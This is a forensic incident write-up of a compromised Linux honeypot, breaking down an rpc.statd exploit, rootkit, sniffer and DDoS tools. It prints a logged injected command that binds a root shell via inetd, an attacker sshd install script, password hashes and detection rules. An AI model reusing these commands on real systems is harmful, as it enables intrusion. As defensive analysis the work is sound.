By
Date: 11 Feb 2000
Contents:
Section 1: Q1 :Identify the intrusion method, its date,
and time. (Assume the clock on the IDS was synchronized with an NTP reference
time source.)
Section 2: Q2 : Identify as much as possible about the
intruder(s).
Section 3: Was there a "rootkit" or other
post-concealment Trojan horse programs installed on the system? If so, what
operating system programs were replaced and how could you get around them?
Section 4: Was there a sniffer or password-harvesting
program installed? If so, where and what files are associated with it?
Section 5: List all the files that were added/modified by
the intruder. Provide an analysis of these programs
Section 6: What is publicly known about the source of any
programs found on the system?
Section 7: Build a time line of events and provide a
detailed analysis of activity on the system, noting sources of supporting or
confirming evidence
Section 8: Provide
a report suitable for management or news media
Section 9: Provide
an advisory for use within the home organization (a fictitious university,
"honeyp.edu", in this case, where I hold an honorary Doctorate, by
the way) to explain the key aspects of the vulnerability exploited, how to
detect and defend against this vulnerability, and how to determine if other
systems were similarly compromised.
Section 10:
Produce a cost-estimate for this incident using the following guidelines
and method:
Section 1: Identify
the intrusion method, its date, and time. (Assume the clock on the IDS was
synchronized with an NTP reference time source.)
The
attack used looks like a statd exploit by ron1n. However the time of attack as
indicated by the honeynet project could be disputed. /var/log/message recovery from the
disk indicates that the attack took place at around "Nov 8: 00:09:00"
instead of ¨Nov 7: 23:11:51" as indicated by the webside. Of course this
could mean that these two equipments were at two different time zones too.
If RH box was at CST (0600) then the snort was running at -0700 time zone.
Nov 8 00:08:41 apollo
inetd[408]: pid 2077: exit status 1
Nov 8 00:08:41 apollo
inetd[408]: pid 2078: exit status 1
Nov 8 00:09:00 apollo rpc.statd[270]:
SM_MON request for hostname containing '/':
^D...^D...^E...^E...^F...^F...^G...^G...08049f10 bffff754 000028f8 4d5f4d5
72204e4f 65757165 66207473
6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f
000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707.......................................
...........K^.v... .^(.. .^... .^... .. ..#.^.1... .F'.F*..
.F..F..+, ...N..V...1...@......./bin/sh -c echo 4545 stream tcp nowait root
/bin/sh sh -i >> /etc
inetd.conf;killall -HUP inetd
Nov 8 04:02:00 apollo
anacron[2159]: Updated timestamp for job `cron.daily' to 2000-11-08
The attacker modified
and restarts inetd. The modification allowed the attacker to login as root
without password using /bin/sh on port 4545.
Probably
from a machine in Texas. However the attacker uses a directory name “paki”
which is not particularly a common word. It is very much possible that the real
attackers start out from somewhere in Pakistan.
216.216.74.2 = ATHM-216-216-xxx-2.home.net
: This is probably a rooted box on a
cable network
Advanced
Commerce Systems (NETBLK-ATWORK-WI33381)
5910 N. Central Expressway, Suite 1040
Dallas, TX 75206
US
Netname: ATWORK-WI33381
Netblock: 216.216.74.0 - 216.216.74.15
Coordinator:
Anderson, Michael J. (MJA-ARIN)
mianders@ADVANCEDCOMMERCE.COM
214-891-6306
Record last updated on 26-Jul-1999.
Database last updated on 6-Feb-2001
18:34:51 EDT.
Though I’ve not been able to
find out which exact rootkit was used, I can provide with a brief analysis of
what was replaced.
The kit used has resemblence to lrk and ark. I believe its
closer to lrk.
Files Replaced – backdoored (to
hide presence)
/bin/ps,
/usr/bin/top, /usr/sbin/syslogd, /bin/ls , /sbin/ifconfig, /bin/netstat,
/usr/sbin/tcpd, /usr/sbin/in.identd, /usr/sbin/in.ftpd
Packages Added – mostly to patch
holes.
Wuftp, lpd, amd
(auto mounter), named
Other files modified/replaced
during attack:
Nov 08 00
06:56:59 17968 ..c -rwx------
root root /bin/ping
45388 ..c -rwx------
root tty /sbin/dump
67788 ..c -rwx------ root tty /sbin/restore
33288 ..c -rwx------
root root /usr/bin/at
35168 ..c -rwx------
root root /usr/bin/chage
36756 ..c -rwx------ root root
/usr/bin/gpasswd
5640 ..c -rwx------
root root /usr/bin/newgrp
531516 ..c -rwx------
root root /usr/bin/sperl5.00503
531516 ..c -rwx------
root root /usr/bin/suidperl
34751 ..c -rwx------
root root /usr/libexec/pt_chown
16488 ..c -rwx------
root bin /usr/sbin/traceroute
5896 ..c -rwx------
root root /usr/sbin/usernetctl
Config files involved
- /dev/ptyp, /usr/man/.a , /usr/man/.p , /usr/man/p , /usr/man/q, /usr/man/r
Sniffer used is
"linsniffer" by Mike Edulla medulla@infosoc.com.
The file "tcp.log" in /usr/man/.Ci could be part of this originaly.
But the real log file
was /var/tmp/nap
The following
executable shell script is also part of this distribution. It does some clean
up to remove old nap logs.
/usr/man/.Ci/
/Anap
Look at the Appendix
for source code of this sniffer.
|
Filename |
Apparent
Author |
Description |
|
|
/dev/ptyp |
Author
of Rootkit |
Txt
file which has info about stuff which needs to be invisible to "ps"
and "top" |
|
|
/usr/libexec/awk/addy.awk |
/usr/man/.Ci/addn |
usr/man/.Ci/addn
writes to this, looks like a mstream configfile ? |
|
|
/usr/man/.Ci/a.sh |
Attacker |
makes
sure rpc stuff is gone |
|
|
/usr/man/.Ci/addn |
Author of Rootkit |
This is some Ddos Tool |
|
|
/usr/man/.Ci/backup/ |
Author of Rootkit |
this is where the real binaries are... |
|
|
/usr/man/.Ci/bx |
Attacker |
looks like bitchx |
|
|
/usr/man/.Ci/chmod-it |
Author of Rootkit |
fixes permissions on newly installed binaries |
|
|
/usr/man/.Ci/clean |
Attacker |
uses "snap" to clean the log files |
|
|
/usr/man/.Ci/do |
Attacker |
cleans up the passwd/shadow file. removes
"own" and "adm1" account. one of these accounts is a root account, other is a user
account |
|
|
/usr/man/.Ci/find |
Author of Rootkit |
Backdoored find |
|
|
/usr/man/.Ci/inetd |
Author of Rootkit |
backdoored inetd |
|
|
/usr/man/.Ci/killall |
Author of Rootkit |
backdoored killall |
|
|
/usr/man/.Ci/needz |
Attacker |
installs pico and screen for putting bot in the
background |
|
|
/usr/man/.Ci/paki/slice |
Not Known |
Syn Flooder source code with spoofed source address |
|
|
/usr/man/.Ci/paki/stream.c |
Not Known |
another one |
|
|
/usr/man/.Ci/pstree |
Author of Rootkit |
fixed pstree |
|
|
/usr/man/.Ci/q |
Mixter |
remote client and server control for Q by Mixter |
|
|
/usr/man/.Ci/qs |
Mixter |
remote client and server control for Q by Mixter |
|
|
/usr/man/.Ci/rmS |
Attacker |
clean up few installation files... |
|
|
/usr/man/.Ci/scan/amd/a.sh |
Attacker |
scans for a class b network 206.110.0.0/16 port 111 |
|
|
/usr/man/.Ci/scan/amd/ben.c |
ryan@junker.org |
Gets RPC ID from a rpc server. |
|
|
/usr/man/.Ci/scan/amd/amdx |
Ron1n |
statd exploit |
|
|
/usr/man/.Ci/scan/amd/pscan |
Unknown |
Usage: %s <b-block> <port> [c-block]\n", argv[0]
Purpose: looks for a specific open port accross a class
b/c network. Its not a generic port scanner, but a scanner to look for specific ports. Something which can b used for looking
for rpc ports. Relevent Code: connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(atoi(argv[2])); connlist[i].a = time(0); connlist[i].status = S_CONNECTING; |
|
|
/usr/man/.Ci/scan/bind/ibind.sh
|
Not Known |
Usage: echo "Usage: ./ibind.sh <b or c
class>" Purpose: looks for bind holes and makes a list of
different kinds of holes. This section does a dig request for bind info --------- for i in Cat $FILE; do
dig version.bind @$i chaos txt >> $OUT 2>/dev/null & done This section catalogs info --------- cat $OUT|grep -v ";;" >>
$VULN1 cat $VULN1|grep -v "server"
>> $VULN2 cat $VULN2|grep -v "@0" >>
$VULN3 cat $VULN3|grep -v "@3" >>
$VULN4 cat $VULN4|grep -v "@4" >>
$VULN5 cat $VULN5|grep -v "@-" >>
$VULN6 cat $VULN6|grep -v "@sec" >>
$VULN7 cat $VULN7|grep -v "@Scan"
>> $VULN8 cat $VULN8|grep -v "@completed"
>> $VULN9 cat $VULN9|grep -v "8.2.2-P"
>> $VULN10 |
|
|
/usr/man/.Ci/scan/daemon/lscan2.c
|
Mixter |
A generic scanner to look for systems with either bind(53), pop(110), pop2(109),imap(143),ftp(21) |
|
|
/usr/man/.Ci/scan/daemon/z0ne |
Unknown |
this is a dDos tool. I'm not exactly sure of what type. |
|
|
/usr/man/.Ci/scan/fs
|
Author of Rootkit |
|
|
|
/usr/man/.Ci/scan/port/strobe
|
*Proff* (proff@suburbia.apana.org.au) |
scanner |
|
|
/usr/man/.Ci/scan/statd/classb |
Attacker |
|
|
|
/usr/man/.Ci/scan/statd/r
|
Unknown |
rpc port scanner |
|
|
/usr/man/.Ci/scan/statd/statdx
|
Unknown |
exploit for statd |
|
|
/usr/man/.Ci/scan/wu
|
Unknown |
scans for rpc/ttdbserver/wingate |
|
|
/usr/man/.Ci/scan/x/pscan |
Unknown |
-- scanner |
|
|
/usr/man/.Ci/scan/x/x |
Unknown |
exploit for x |
|
|
/usr/man/.Ci/scan/x/xfil |
Unknown |
|
|
|
/usr/man/.Ci/scan/x/xscan |
Attacker |
scan for x servers |
|
|
/usr/man/.Ci/snap |
Attacker |
called by clean to cleanup the log files. |
|
|
/usr/man/.Ci/sniff |
Mike Edulla medulla@infosoc.com |
Sniffer used is "linsniffer" |
|
|
/usr/man/.Ci/sp.pl |
Attacker |
|
|
|
/usr/man/.Ci/syslogd |
Author of Rootkit |
|
|
|
/usr/man/.a |
Attacker |
This has some IP's might be used by some package to hide
these connections |
|
|
/usr/man/.p |
Attacker |
same a /dev/ptyp… only smaller in size… |
|
|
/usr/man/p |
Attacker |
same as /usr/man/.p |
|
|
/usr/man/r |
Attacker |
donno… looks similar… |
|
|
/var/tmp/nap |
|
Password sniffing log generated by snif |
|
|
/usr/man/.Ci/
/Anap |
Attacker |
Anti NAP ? Heh.. Removes the nap log… should be
triggered by one of the proggies to clean nap… just incase.. |
|
|
/usr/bin/pawd |
Author of Rootkit |
What does this do ?? |
|
|
/tmp/.bash_history
-> /dev/null |
|
This was probably part of the
"own"/"adm1" account |
|
|
/root/.bash_history
-> /dev/null |
|
This was to hide logs of root's action on the box |
|
|
/usr/man/.Ci/fix |
Author of Rootkit |
This trojans the real files and uses the backup to keep
funtionality. |
|
|
/usr/games/.bash_history
-> /dev/null |
|
This was to hide logs of root's action on the box |
|
|
/bin/ps |
Author of Rootkit |
|
|
|
/usr/bin/top |
Author of Rootkit |
|
|
|
/usr/sbin/syslogd |
Author of Rootkit |
|
|
|
Backup |
Author of Rootkit |
|
|
|
/sbin/ifconfig
|
Author of Rootkit |
|
|
|
/bin/netstat |
Author of Rootkit |
|
|
|
/usr/sbin/tcpd |
Author of Rootkit |
|
|
|
/usr/sbin/in.identd |
Author of Rootkit |
|
|
|
/usr/sbin/in.ftpd |
Author of Rootkit |
|
|
Mixter
– lscan2.c, q, qs
Ron1n-
amdx, statd exploit used
Strobe-
proff
Linsniffer-
mike edulla
Ben.c
- rayn
Section 7: Build a
time line of events and provide a detailed analysis of activity on the system,
noting sources of supporting or confirming evidence
The
attack used looks like a statd exploit by ron1n. However the time of attack as
indicated by the honeynet project could be disputed. /var/log/message recovery from the
disk indicates that the attack took place at around "Nov 8: 00:09:00"
instead of ¨Nov 7: 23:11:51" as indicated by the webside. Of course this
could mean that these two equipments were at two different time zones too.
If RH box was at CST (0600) then the snort was running at -0700 time zone.
Nov 8 00:08:41 apollo
inetd[408]: pid 2077: exit status 1
Nov 8 00:08:41 apollo
inetd[408]: pid 2078: exit status 1
Nov 8 00:09:00 apollo
rpc.statd[270]: SM_MON request for hostname containing '/':
^D...^D...^E...^E...^F...^F...^G...^G...08049f10 bffff754 000028f8 4d5f4d5
72204e4f 65757165 66207473
6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f
000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707.......................................
...........K^.v... .^(.. .^... .^... .. ..#.^.1... .F'.F*..
.F..F..+, ...N..V...1...@......./bin/sh -c echo 4545 stream tcp nowait root
/bin/sh sh -i >> /etc
inetd.conf;killall -HUP inetd
Nov 8 04:02:00 apollo
anacron[2159]: Updated timestamp for job `cron.daily' to 2000-11-08
The attacker modified
and restarts inetd. The modification allowed the attacker to login as root
without password using /bin/sh on port 4545.
The attacker probably
had run an automated attack tool. The first time the attacker logged in was at
0625 (CST). Among the first few actions the
attacker took,
included creation of two different accounts on the system "own" and
"adm1". Probably this was used by the attacker to ssh/telnet
back to the system and then gain local
root access using su. This modification
was later removed using “do” script.
/etc/passwd
own:x:0:0::/root:/bin/bash
adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash
/etc/shadow
own::10865:0:99999:7:-1:-1:134538460
adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
Though I cannot
confirm this, I feel the attacker at this point did an FTP to an unknown site
from where he downloaded the rootkit+otherstuff.
Nov 08 00 06:29:27 63728
.a. -rwxr-xr-x root root /usr/bin/ftp
Someone logged in
(probably the attacker using the new account)
Nov 08 00 06:45:18 161
.a. -rw-r--r-- root root /etc/hosts.allow
0
.a. -rw-r--r-- root root /etc/hosts.deny
Nov 08 00 06:45:19 63
.a. -rw-r--r-- root root /etc/issue.net
Nov 08 00 06:45:24 1504
.a. -rw-r--r-- root root /etc/security/console.perms
The attacker untars and
changes permissions of the tools installed in
/usr/man/.Ci
Nov 08 00 06:51:54 714
..c -rwxr-xr-x 1010 users /usr/man/.Ci/a.sh
7229
..c -rwxr-xr-x 1010 users /usr/man/.Ci/snif
Nov 08 00 06:51:55 698
..c -rwxr-xr-x 1010 users /usr/man/.Ci/clean
147900
..c -rwxr-xr-x 1010 users /usr/man/.Ci/inetd
After installation of tool the attacker
modified and added a few files to the OS.
"amd" which looks like "automounter" is installed.
ldconfig
is run.
This is probably when
the rootkit script was run. The rootkit as you can see from the file attached
installs ssh/ftp/named/lpd and backdoors a lot of
binaries with its own
version of binaries.... probably ftp/lpd/named were updated to fix holes...
Nov 08 00 06:55:58 657
m.c -rw-r--r-- root root /etc/passwd
601
m.c -rw-r--r-- root root /etc/shadow
Named installed
Nov 08 00 06:54:22 6416
mac -rwxr-xr-x root root /usr/local/bin/addr
Either the intruder himself (I don’t think though) or
someone else logged in as “drosen” and /var/tmp/nap got its first password
entry.
Nov 08 00 06:59:07 4096
m.c drwx------ drosen drosen /home/drosen
Inetd.conf changed and entry for
sh on port 4545 removed
Nov 08 00 07:03:05 3027 m.c -rw-r--r-- root root /etc/inetd.conf
Admin logged in at this time, and found problems. Within
two hours the system was brought down for analysis
Nov 08 00 18:37:30 20452
.a. -rwxr-xr-x root root /bin/login
1262
.a. -rw-r--r-- root root /etc/localtime
437
.a. -rw-r--r-- root root /etc/pam.d/login
We regret to announce
that one of our servers Apollo was comprimised on Novermber 8th by unknown
intruders.
The attackers used a
security hole in our “rpc.statd” to gain access to our server. Later during
that day the attacker installed a few tools on the server and implemented
backdoors to hide the attacker from a normal user on the system. Some of the
tools installed indicates that the attacker was making an attempt to install a
DdoS tool on this server to attack other servers outside. Also found were tools
like “BitchX” which would have allowed the attacker to control the server from
a IRC channel behind an anonymous nickname.
We have taken
precautionary measures and are doing a full scale organization search for other
signs of compromise. Our priliminary
investigation shows that this was the only system compromised and nothing
sensative was stolen. We have contacted
the ISP from where the attack originated are making an attempt to identify the
attackers.
We have upgraded our
Firewall filters to detect these attacks on the border and have sent a notification
to all Sysadmins in our orgnization to advise them how to secure their systems
so that this does not happen again.
As of 0600 hrs Nov 9th,
we have brought Apollo back online for normal use.
===============================================================================
Topic: rpc.statd
exploit warning Advisory
Announced: 11th Feb
2001
OS Effected: All
Linux Distributions with un-patched rpc.statd
Solution Available:
Yes
Severity: root
compromise
===============================================================================
We have noticed
detected an increase in attacks on Linux based servers all around the world. Anyone running unpatched version
of RPC on Linux Redhat is open to this
attack.
In this particular
attack the attacker uses common rpc.statd buffer overflow exploit to gain root
compromise. This requires "rpc.statd" to be running on
the
box. The attacker then modifies and
re-starts inetd with a shell bound to a port.
Attacker installs a
rootkit (possibily lrk/ark) with password sniffing ability. The rootkit
modifies and installs a few critical binaries including ps, top, syslogd, ls,
ifconfig, netstat tcpd and identd. The
attacker also installs his own version of sshd and wuftp.
If you are running a
version of unpatched rpc.statd then you should start looking for signs of
compromise immediately before you do a upgrade. Check
for MD5 signatures of
your binaries. If you suspect any changes you are recomended to reinstall the OS. Another quicker way of checking
weather this
exact attack was used
against you, you could check for the existance of
"/usr/man/.Ci/backup/ls" by executing it.
The attacker installs
a password harvesting program and runs a DdoS tool kit on the server.
/dev/ptyp -- Txt file
which has info about stuff which needs to be invisible to "ps" and
"top"
/usr/libexec/awk/addy.awk -- usr/man/.Ci/addn writes to this,
looks like a mstream configfile ?
/usr/man/.Ci/a.sh -- makes
sure rpc stuff is gone
/usr/man/.Ci/addn -- This is some Ddos Tool
/usr/man/.Ci/backup/ -- this is where the real binaries are...
/usr/man/.Ci/bx -- looks like bitchx
/usr/man/.Ci/chmod-it --
fixes permissions on newly installed binaries
/usr/man/.Ci/clean -- uses "snap" to clean the log files
/usr/man/.Ci/do -- cleans up the passwd/shadow file. removes
"own" and "adm1" account.
one of these accounts is a root account, other is a user account
/usr/man/.Ci/find -- Backdoored find
/usr/man/.Ci/inetd -- backdoored inetd
/usr/man/.Ci/killall -- backdoored killall
/usr/man/.Ci/needz -- installs pico and screen for putting bot in
the background
/usr/man/.Ci/paki/slice -- Syn Flooder source code with spoofed
source address
/usr/man/.Ci/paki/stream.c -- another one
/usr/man/.Ci/pstree -- fixed pstree
/usr/man/.Ci/q -- remote client and server control for Q by Mixter
/usr/man/.Ci/qs -- remote client and server control for Q by
Mixter
/usr/man/.Ci/rmS -- clean
up few installation files...
/usr/man/.Ci/scan/amd/a.sh -- scans for a class b network
206.110.0.0/16 port 111
/usr/man/.Ci/scan/amd/ben.c -- Gets RPC ID from a rpc server.
/usr/man/.Ci/scan/amd/amdx --
statd exploit
/usr/man/.Ci/scan/amd/pscan --
looks for a specific open port accross a class b/c network. Its not a
generic port scanner, but a scanner to look for
specific ports. Something
which can b used for looking for rpc ports.
/usr/man/.Ci/scan/bind/ibind.sh -- looks for bind holes and makes a list of different kinds of
holes.
/usr/man/.Ci/scan/daemon/lscan2.c
-- A generic scanner to look for systems with either
/usr/man/.Ci/scan/daemon/z0ne --
this is a dDos tool. I'm not exactly sure of what type.
/usr/man/.Ci/scan/fs
/usr/man/.Ci/scan/port/strobe
-- scanner
/usr/man/.Ci/scan/statd/classb
/usr/man/.Ci/scan/statd/r --
rpc port scanner
/usr/man/.Ci/scan/statd/statdx
-- exploit for statd
/usr/man/.Ci/scan/wu --
scans for rpc/ttdbserver/wingate
/usr/man/.Ci/scan/x/pscan --
scanner
/usr/man/.Ci/scan/x/x -- exploit for x
/usr/man/.Ci/scan/x/xfil
/usr/man/.Ci/scan/x/xscan --
scan for x servers
/usr/man/.Ci/snap -- called
by clean to cleanup the log files.
/usr/man/.Ci/sniff -- Mike Edulla medulla@infosoc.com
/usr/man/.Ci/sp.pl
/usr/man/.Ci/syslogd
/usr/man/.a -- This has
some IP's might be used by some package to hide these connections
/usr/man/.p -- same a /dev/ptyp…
only smaller in size…
/usr/man/p -- same as
/usr/man/.p
/usr/man/r -- donno… looks similar…
/var/tmp/nap-- Password
sniffing log generated by snif
/usr/man/.Ci/ /Anap --
Anti NAP ? Removes the nap log… should be triggered by one of the proggies
to clean nap… just incase..
/usr/bin/pawd -- What
does this do ??
/tmp/.bash_history -> /dev/null -- This was probably part of the "own"/"adm1"
account
/root/.bash_history -> /dev/null -- This was to hide logs of root's action on the box
/usr/man/.Ci/fix -- This
trojans the real files and uses the backup to keep funtionality.
/usr/games/.bash_history -> /dev/null -- This was to hide logs of root's action on
the box
Though the recomended
way of recovery is full reinstall, you could clean up the system in other ways
too, provided this was the only instance of root compromise on your system.
cd
/usr/man/.Ci/backup
cp
ps /bin/ps
cp
top /usr/bin
cp
syslogd /usr/sbin/syslogd
cp
ls /bin/ls
cp
ifconfig /sbin/ifconfig
cp
netstat /bin/netstat
cp
tcpd /usr/sbin/tcpd
cp
in.identd /usr/sbin
rm
-r -f /usr/man/.Ci
rm
/bin/bx
rm
/usr/sbin/sshd
rm
/usr/local/sbin/sshd
rm
/dev/ptyp
rm
/usr/man/.a
rm
/usr/man/.p
rm
/usr/man/q
rm
/usr/man/r
rm /usr/libexec/awk/addy.awk
rm
/usr/bin/screen
rm /usr/bin/telnet
rm
/etc/skel/.screenrc
rm /bin/ping
rm
/sbin/dump
rm
/sbin/restore
rm
/usr/bin/at
rm
/usr/bin/chage
rm
/usr/bin/gpasswd
rm
/usr/bin/newgrp
rm
/usr/bin/sperl5.00503
rm
/usr/bin/suidperl
rm
/usr/libexec/pt_chown
rm
/usr/sbin/traceroute
rm
/usr/sbin/usernetctl
Note: your system
might be unusable untill you install ssh and telnet all over again. Contact
your vendor for latest set of binaries.
Primary
Rootkit files
/bin/ps
/usr/bin/top
/usr/sbin/syslogd
/sbin/ifconfig
/bin/netstat
/usr/sbin/tcpd
/usr/sbin/in.identd
/usr/sbin/in.ftpd
Others
modified/replaced
/bin/ping
/sbin/dump
/sbin/restore
/usr/bin/at
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sperl5.00503
/usr/bin/suidperl
/usr/libexec/pt_chown
/usr/sbin/traceroute
/usr/sbin/usernetctl
VI Rootkit Details
Files
Modified: /bin/ps, /usr/bin/top, /usr/sbin/syslogd, /bin/ls , /sbin/ifconfig,
/bin/netstat, /usr/sbin/tcpd, /usr/sbin/in.identd, /usr/sbin/in.ftpd
Config files: involved
- /dev/ptyp, /usr/man/.a , /usr/man/.p , /usr/man/p , /usr/man/q, /usr/man/r
VII Detection
We
recommend installation of snort http://www.snort.org
for detection of rpc scan activity.
Snort
does detect rpc activity using the following ruleset
alert TCP
$EXTERNAL any -> $INTERNAL any (msg: "IDS442/rpc-statdx-exploit";
flags: AP; content: "/bin|c74604|/sh";)”
Also look at http://whitehats.com/info/IDS442
Port
scanning should be always looked at with suspicion
alert TCP $EXTERNAL any -> $INTERNAL any
(msg: "IDS441/probe-Synscan-Portscan"; id: 39426; flags: SF;)
Also look at http://whitehats.com/info/IDS441
Chkrootkit
is a nice tool which you to run automatic rootkit scanners on your servers.
More info is available at http://www.chkrootkit.org/
Use
CRC checking: like tripwire and fcheck to regularly look for problems
More info at http://www.tripwire.com
And at http://freshmeat.net/projects/fcheck/
VIII. Incident
Reporting
If
you system is already compromised, and if the server is not critical, we
Request you to let us know so that we can do further investigation of the
incident.
IX Recomendations
Its
possible that your system is wide open for other attacks too. Patch your system
immediately with latest set of OS patches. Remove all services not
required
in inetd. Mount the root and /usr as “read-only” if possible. And keep a look
out for trouble.
Experiance in
Sysadmin:
2 years on Solaris, 5 on other
Unix/Linux.
I've done enough programming to learn
something new pretty fast.
I use perl/shell/php regularly for my
regular stuff.
I am security aware Admin. and I am
hooked onto BugTraqs
and other incident lists.
Effort put in: I must
have put an estimated 40 Hours for this Investigation.
And another 40 hours
to make this write up. But that is more becuase I didn't
know where to start
from :) Next time it would be faster...
Cost: It would be
close to 1000 Dollars atleast. Though I'm sure people would
charge much higher for
such kind of analysis.
After mounting the drives as readonly, the first thing I did was have
a look around the drive to see if I could see something with my bare eyes (no
tools). Next I tried using find to see if the
timestamps can help me.
Ofcourse that was a very inefficient route to take, and I should have
used TCT from the very beginning.
Once I had TCT compiled I used mactime to do most of my work. I got a
list of "accessed" files, and those which were "modified".
Most of the work ewent
into analysing the various timestamps and reconstructing what happened
when.
Once I had a fair idea of what was installed and what could have been
modifed I started hunting for answers in the deleted files. Unfortunately
mactime didn't give me info about stuff which has been deleted. I'm sure there
are a million ways of doing this, but I used the "HEX FILE viewer" in
"mc" for my job. I specifically looked for the /var/logs/messages
file and the passwd/shadow file.
I also found the rootkit install script as a bonus during the process.
All of the above actually helped me confirm the timeline I created earlier.
The most difficult part of the challenge was
writing up this documentation in a readable format for everybody to
understand. I’ve listed below the
various references I used which I used to write this documentation. I wish to
make a special mention that Max Vision’s “Ramen Analysis” had a lot to do with HTML formatting of this
document. That is also one of the most interesting pieces of analysis I’ve read
in a while.
"Multiple Linux
Vendor rpc.statd Remote Format String Vulnerability", http://www.securityfocus.com/bid/1480
"statdx.c" exploit by ron1n, posted to Bugtraq mailing list
“Redhat
Linux 6.x remote root exploit”: http://www.kulua.org/Archives/kulua-l/200008/msg00159.html by "Christofer C. Bell"
<cbell@jayhawks.net>
“Refence of addy.awk as part of rootkit”: http://www.cs.fiu.edu/campus/cndg/msg00007.html by David Dittrich
“mstream analysis”: http://staff.washington.edu/dittrich/misc/mstream.analysis.txt by David Dittrich
“Multiple Linux Vendor rpc.statd Remote Format String
Vulnerability” :http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dexploit%26vid%3D1480
by
ron1n <shellcode@hotmail.com>
”Explaination of exploit” http://security-archive.merton.ox.ac.uk/bugtraq-200008/0091.html
ron1n
- (shellcode@HOTMAIL.COM)
“Exploit
signature”: http://www.whitehats.com/info/IDS442
“A
very old statd exploit”: http://p.ulh.as/xploitsdb/SunOS/statd.html
“How
to do a Forensic analysis”: http://staff.washington.edu/dittrich/misc/forensics/
by David Dittrich
“How
Statd exploit looks like 1”:http://www.sans.org/y2k/081600.htm
“How
Statd exploit looks like 2”:http://www.sans.org/y2k/110900.htm
“CERT
Advisory” http://www.cert.org/incident_notes/IN-2000-10.html
"Redhat
Errata", http://www.redhat.com/support/errata/
“Links
to more resources” : http://security.royans.net/static/resource.shtml
“How pscan is used: An old
version of pscan is discussed here” http://www.khubla.com/bhack.html#SkipFileList
“Discussion
on z0ne :” http://project.honeynet.org/papers/motives/day4.txt
/etc/passwd
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP
User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X
Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL
Server:/var/lib/pgsql:/bin/bash
drosen:x:500:500::/home/drosen:/bin/bash
own:x:0:0::/root:/bin/bash
adm1:x:5000:5000:Tech
Admin:/tmp:/bin/bash
/etc/shadow
6Z/:11266:0:99999:7:-1:-1:134540356
bin:*:11266:0:99999:7:::
daemon:*:11266:0:99999:7:::
adm:*:11266:0:99999:7:::
lp:*:11266:0:99999:7:::
sync:*:11266:0:99999:7:::
shutdown:*:11266:0:99999:7:::
halt:*:11266:0:99999:7:::
mail:*:11266:0:99999:7:::
news:*:11266:0:99999:7:::
uucp:*:11266:0:99999:7:::
operator:*:11266:0:99999:7:::
games:*:11266:0:99999:7:::
gopher:*:11266:0:99999:7:::
ftp:*:11266:0:99999:7:::
nobody:*:11266:0:99999:7:::
xfs:!!:11266:0:99999:7:::
named:!!:11266:0:99999:7:::
postgres:!!:11266:0:99999:7:::
drosen:$1$X2MTV07B$jKfJisg1QOjpfXouUcg0i0:11266:0:99999:7:-1:-1:134540380
own::10865:0:99999:7:-1:-1:134538460
adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
File:
honeypot.hda5.dd Col 0 1229728Kb bytes
87%
................echo
"installing sshd"
gunzip ssh-1.2.27*
tar -xvf ssh-1.2.27*
cd ssh*
make install
rm -rf /etc/sshd_config
cat << hi >> /etc/sshd_config
#
This is ssh server systemwide configuration file.
Port
22
ListenAddress
0.0.0.0
HostKey
/etc/ssh_host_key
RandomSeed
/etc/ssh_random_seed
ServerKeyBits
768
LoginGraceTime
600
KeyRegenerationInterval
3600
PermitRootLogin
yes
IgnoreRhosts
no
StrictModes
yes
QuietMode
yes
X11Forwarding
yes
X11DisplayOffset
10
FascistLogging
no
PrintMotd
yes
KeepAlive
yes
SyslogFacility
DAEMON
RhostsAuthentication
no
RhostsRSAAuthentication
yes
RSAAuthentication
yes
PasswordAuthentication
yes
PermitEmptyPasswords
yes
UseLogin
no
#
CheckMail no
#
PidFile /u/zappa/.ssh/pid
#
AllowHosts *.our.com friend.other.com
#
DenyHosts lowsecurity.theirs.com *.evil.org evil.org
#
Umask 022
#
SilentDeny yes
hi
rm -rf /usr/sbin/sshd /usr/sbin/sshd1
cp /usr/local/sbin/sshd1 /usr/sbin/sshd
echo "/usr/local/sbin/sshd1" >>
/etc/rc.d/rc.local
ps aux | grep sshd | awk '{print "kill -1
"$2""}' > restart-sshd
chmod +x restart-sshd
echo "done installing sshd"
echo "now restarting"
echo "dont forget to remove the sshd folders"
./restart-sshd
..............................................................................................................................................................
..............................................................................................................................................................
....................................................................Ci/install-sshd...........................................................................
.........0100755.0001762.0000144.00000002064.07116122235.012563.
0............................................................................................
........ustar
.xrt.............................users.........................................................................................................
.........................................................................................................echo
"installing sshd"
gunzip
ssh-1.2.27*
tar
-xvf ssh-1.2.27*
cd
